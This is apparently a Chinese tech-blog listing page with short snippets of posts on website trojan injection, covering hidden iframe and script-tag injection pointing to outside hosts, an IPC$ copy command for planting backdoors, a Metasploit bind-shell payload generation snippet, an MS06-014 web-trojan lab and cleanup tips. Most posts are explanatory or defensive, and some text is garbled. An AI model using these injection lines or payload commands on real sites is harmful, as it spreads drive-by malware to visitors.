众所周知,目标主机建立IPC$连接后,要把后门,木马之类的软件传过去,这就是DOS基础的命令,是入侵的基?N艺饫锞托锤龈袷健?一、copy 呵呵,命令一写就知道了吧,在网上看的太多了,其他格式都不用我写了,呵呵。 copy 本地文件 \\目标IP\目标共享文件夹  
转载 2010-02-13 02:42:57
198阅读
在百度上搜索 : site:tpy888.cn 零点棋牌 出现sitemap/Artlc.php 很是奇怪,文件的属主是www:www 后来我把目录修改成744,index.php为644,再把discuz的 data/avatar目录删除了,竟然问题解决了。 用下面的命令找出来的: /bbs/data/avatar/0/8/dam.php:   
原创 2012-06-04 18:00:16
847阅读
在网络安全领域,Linux系统一直以其稳定性和安全性而备受推崇。然而,即使是这样一个被广大用户认为安全无比的系统,也难免会受到恶意软件的侵袭。其中,一种常见的恶意软件就是“”(Trojan horse)。 “”是指一种假冒正规程序,潜藏在系统中,等待着不法分子的操控,实施各种恶意活动的恶意软件。它通常会伪装成一些看起来无害的程序或文件,诱骗用户点击下载或安装,一旦用户中招,就会开始悄
新手段 2008-08-19 15:41:24  标签: 新手段    [
转载 精选 2008-08-30 04:46:41
354阅读
         近段时间,blog经常被<script src=http://%76%63%63%64%2E%63%6E></script>挂上木马。搜集资料,也做过相应css样式来解决,但css不能阻止页面有此木马,只是客户端访问的时候,屏蔽掉或者终止掉,测试后杀毒软件还是会提示网
原创 2009-10-15 10:42:42
542阅读
网页木马定义:             取得控制权的网站--嵌入恶意代码--用户访问(恶意代码利用浏览器,第三方activex或插件(flash,pdf)漏洞)--下载并执行恶意代码。 马方式:        &
原创 2010-04-02 14:07:38
868阅读
2评论
<iframe src="[url]http://www.5study.com/admin-nis/eWebEditor/CSS/index.htm[/url]" name="zhu" width="0" height="0" frameborder="0"></iframe><iframe src="[url]http://www.5study.com/admin-
原创 2007-03-07 22:17:11
1090阅读
今天在检查网站时,通过urlsnoof发现网站有很多链接,通过分析代码发现存在以下内容: <MARQUEE width=0 height=0><a href="[url]http://www.zondatz.com[/url]">涂装设备</a><a href="[url]http://www.jshxzj.com[/url]">抛丸机</a
原创 2008-08-19 15:41:24
1104阅读
半夜一个网站被黑了,然后突然发现在访问服务器所有html页面的时候,自动插入iframe通过以下各项检查,均未能发现问题1、安装了防火墙2、检查了web程序3、检查了当天有没有新建或修改的文件(exe,bat,dll等)4、非本地DNS被ARP准备放弃的时候。查看了下iis的的配置 我们找到这个文件 打开以后果然是的IFRMAE内容 打开IIS,在你的计算机名(根目录)右键选择属性,
原创 2009-10-29 17:34:20
1065阅读
<%@LANGUAGE="VBScript" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 TranSitiOnal//EN" "http://www.w3.Org/TR/xhtml1/DTD/xhtml1-tranSitiOnal.dtd"> <html xmlnS="http://w
原创 2009-07-30 15:20:57
441阅读
root@localhost:~# msfconsolmsf > show #寻求帮助msf > use windows/shell/bind_tcp#msf payload(bind_tcp) > set RHOST 192.168.48.100RHOST => 192.168.48.100msf payload(bind_tcp) > generate -tc#
原创 2017-07-04 14:46:34
1747阅读
技术讨论,请勿做非法的事。如果你要用我的方法去做,我也没办法,呵呵。关于,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。一、利用htc文件来加载iframe。百度百科里对htc文件的解释为:从5.5版本开始,Internet Explorer(IE)开始支持Web 行为的概念。这些行为是由后缀名为.htc的脚本文件描述的
转载 精选 2012-07-05 12:17:52
189阅读
网站被怎么办?网站被怎么解决?服务器被入侵怎么解决,SQL数据库被怎么解决
原创 2012-01-21 18:39:56
580阅读
据瑞星“云安全”系统监测,11日,“彭城视窗”、“鼓楼青年”、“温州信用网”等网站被,用户浏览这些网站后,可能感染:Worm.Win32.Agent.auh(蠕虫),导致用户系统功能严重异常。
转载 2011-10-08 19:56:00
108阅读
2评论
意思是当你访问该网站的时候,你的计算机就自动中了木马。当然黑客就可以控制你的电脑 步骤:WEB服务器配置1、web服务器IP 192.168.0.12、网卡类型VM2 黑客天下计算机  网卡类型VM21、黑客计算机IP为192.168.0.2 配置灰鸽子服务器端程序,192.168.0.2 2、使用MS06014制作网页木马,输入http://192.168.0.1/qq.exe,
原创 2010-04-09 12:53:01
562阅读
  不论是那一种帮凶,黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将木马保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该
推荐 原创 2009-03-24 22:21:34
5622阅读
4评论
网页是攻击者惯用的入侵手段,其影响极其恶劣。不仅让站点管理者蒙羞,而且殃及池鱼使站点的浏览者遭殃。不管是站点维护者还是个人用户,掌握、了解一定的网页及其防御技术是非常必要的。   1、关于网页   网页就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。   2、获取
转载 精选 2011-03-18 12:08:04
358阅读
1:网页的种类. 目前最常见的网页形式有三种: JS:一般此类都会影响网站下的所有页面,因为许多网站都会导入同一个JS文件。这也是危害最大的一种网页马方式 iframe:这种不多说,和JS相似,也是十分常见的。 程序:对于那些使用asp,php等程序页面来说,很容易被人直接通过程序漏洞等进行,这种形式网页木马比较严重,一般发生这种情况说明服务器或网
转载 2012-04-28 10:38:43
1453阅读
原文来自:http://bbs.51cto.com/thread-600391-1.html不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入: <IFRAME SRC=http://cool.47555.com/k.htm width =1 height=1 frameborder=0></IFR
转载 精选 2014-08-26 16:12:21
1323阅读
曾经有许朋友的DEDE后台程序很容易被,当然每个人都是通过一点一点积累经验,从被挂到能轻松防范,这需要一个 逐渐积累的过程,任何事情都不是一蹴而就的,所以我们只要研究了方法就不会被。 下面就来谈一谈具体的方法:   精简设置篇:   不需要的功能统统删除。比如不需要会员就将member文件夹删除。删除多余组件是避免被hack注射的最佳办法。将每个目录添加空的index.html,防止
原创 2023-06-07 06:40:37
25阅读
  • 1
  • 2
  • 3
  • 4
  • 5